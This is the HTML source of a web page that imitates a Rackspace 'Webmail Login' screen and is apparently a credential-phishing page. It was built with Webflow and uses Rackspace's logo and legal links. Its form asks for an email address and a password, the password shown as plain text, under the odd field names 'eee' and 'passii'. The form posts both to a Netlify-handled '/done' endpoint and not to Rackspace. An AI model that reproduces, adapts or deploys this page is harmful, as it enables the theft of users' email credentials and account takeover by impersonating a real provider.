<!DOCTYPE html><!--  This site was created in Webflow. https://www.webflow.com  -->
<!--  Last Published: Fri Oct 28 2022 16:42:48 GMT+0000 (Coordinated Universal Time)  -->
<html data-wf-page="635bca552b1b1639d38903df" data-wf-site="635bca552b1b1641ee8903de">
<head>
  <meta charset="utf-8">
  <title>Rackspace-user-account-security-id-394r0473929b</title>
  <meta content="width=device-width, initial-scale=1" name="viewport">
  <meta content="Webflow" name="generator">
  <link href="css/normalize.css" rel="stylesheet" type="text/css">
  <link href="css/webflow.css" rel="stylesheet" type="text/css">
  <link href="css/rackspace-user-account-security-id-394r.webflow.css" rel="stylesheet" type="text/css">
  <script src="https://ajax.googleapis.com/ajax/libs/webfont/1.6.26/webfont.js" type="text/javascript"></script>
  <script type="text/javascript">WebFont.load({  google: {    families: ["Montserrat:100,100italic,200,200italic,300,300italic,400,400italic,500,500italic,600,600italic,700,700italic,800,800italic,900,900italic"]  }});</script>
  <!-- [if lt IE 9]><script src="https://cdnjs.cloudflare.com/ajax/libs/html5shiv/3.7.3/html5shiv.min.js" type="text/javascript"></script><![endif] -->
  <script type="text/javascript">!function(o,c){var n=c.documentElement,t=" w-mod-";n.className+=t+"js",("ontouchstart"in o||o.DocumentTouch&&c instanceof DocumentTouch)&&(n.className+=t+"touch")}(window,document);</script>
  <link href="images/favicon.ico" rel="shortcut icon" type="image/x-icon">
  <link href="images/webclip.png" rel="apple-touch-icon">
</head>
<body>
  <div class="section wf-section">
    <div class="div-block-3">
      <div class="div-block-4">
        <h2 class="heading">Webmail Login</h2><img src="images/Rackspace_Technology_Logo_RGB_WHT.png" loading="lazy" alt="" class="image">
      </div>
      <div class="div-block-5">
        <div class="div-block-6"><img src="images/blo.jpg" loading="lazy" alt="" class="image-2">
          <div class="div-block-7"></div>
        </div>
        <div data-netlify="true" class="form-block-2 w-form">
          <form id="email-form" name="email-form" data-name="Email Form" action="/done" method="post" data-netlify="true" class="form"><label for="eee" class="field-label-2">Email address</label><input type="email" class="text-field w-input" maxlength="256" name="eee" data-name="eee" placeholder="" id="eee" required=""><label for="email" class="field-label"><br>Password</label><label for="passii" class="field-label bambi">Forgot password?</label><input type="text" class="text-field-2 w-input" maxlength="256" name="passii" data-name="passii" placeholder="" id="passii" required=""><input type="submit" data-wait="Please wait..." value="Log in" class="submit-button w-button"></form>
          <div class="w-form-done">
            <div>Thank you! Your submission has been received!</div>
          </div>
          <div class="w-form-fail">
            <div>Oops! Something went wrong while submitting the form.</div>
          </div>
        </div>
      </div>
      <div class="text-block-2">
        <a target="_blank" href="http://www.rackspace.com/information/legal/privacystatement" class="link-2">Privacy Statement </a>| <a target="_blank" href="http://www.rackspace.com/information/legal/websiteterms" class="link-3">Website Terms</a>
      </div>
    </div>
    <div class="text-block">Need webmail for your business? Learn more about <a href="https://www.rackspace.com/email-hosting/webmail" class="link">Hosted Email </a>from Rackspace</div>
  </div>
  <script src="https://d3e54v103j8qbb.cloudfront.net/js/jquery-3.5.1.min.dc5e7f18c8.js?site=635bca552b1b1641ee8903de" type="text/javascript" integrity="sha256-9/aliU8dGd2tb6OSsuzixeV4y/faTqgFtohetphbbj0=" crossorigin="anonymous"></script>
  <script src="js/webflow.js" type="text/javascript"></script>
  <!-- [if lte IE 9]><script src="https://cdnjs.cloudflare.com/ajax/libs/placeholders/3.0.2/placeholders.min.js"></script><![endif] -->
</body>
</html>